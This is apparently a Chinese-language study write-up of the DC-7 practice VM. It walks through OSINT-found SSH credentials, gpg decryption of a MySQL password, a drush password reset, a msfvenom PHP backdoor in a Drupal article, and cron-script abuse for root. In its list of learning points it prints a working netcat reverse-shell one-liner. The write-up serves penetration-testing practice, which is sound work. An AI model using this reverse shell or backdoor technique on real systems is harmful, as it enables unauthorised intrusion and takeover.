DC靶机系列——DC-7练习
DC-7的端口服务只有22和80端口,也就是ssh
登录和web
服务。
在探测web
服务的过程中,没有找到相应的web漏洞。
这里就要想办法通过侧面来进攻,考验的是对信息的敏感性。发现有一个@DC7USER
,放在谷歌搜索一下,发现一个twitter和github,在github里面存在敏感信息,猜测可能是ssh的密码,果然进入。
获取初步权限后,继续在低权限情况下进行信息收集。如列举系统用户,查看网站备份源码,查询线上数据库,查询定时脚本等。然后再一封邮件中发现了更多信息,定时脚本里也发现了执行脚本的历史记录,结果解密源码发现gpg的passphrase
,通过解密敏感文件进一步获取mysql
密码,获取之后可查看数据库,可获取前端web的账户名。
在定时脚本里面发现可以在特定位置执行特定命令。谷歌这些命令,发现其中一个是可以用来改web服务密码的,用来改密码,然后登陆进后台。
登陆进后台,搜集框架信息,基于对drupal的了解,可以编辑文章处插入php代码
来执行菜刀后门。这个菜刀后门由msfvenom
来生成。知识点:msfvenom生成后门及客户端的使用。
通过菜刀连接,可以获取www-data
权限。通过这个账号,可以对定时脚本进行写入操作,这里写入一个bash
菜刀后门,连接成功后即为root权限。
总体来说,有一次横向提权,一次纵向提权。
理论上来说,可读的定时脚本里面解密出来的东西,可以用来提取数据。
通过命令执行的四步跳(信息泄露,获取dc7user低权限账号,进行登录;drupal的框架命令执行修改密码,登录后台;文章的PHP代码上传菜刀后门,获取www-data权限; 定时任务,获取root权限),可以获取最终root权限。
知识点:
1.ssh的使用
2.gpg加密解密的使用
3.mariaDB命令行获取数据,sql语句
4.msfvenom和msfconsole的使用
5.bash菜刀的使用, pipe
的理解
rm /tmp/f;
mkfifo /tmp/f; // make FIFOs named pipes
cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.99.101 4445 > /tmp/f
6.nc的使用与理解
7.drupal框架命令的使用与理解
特别是drush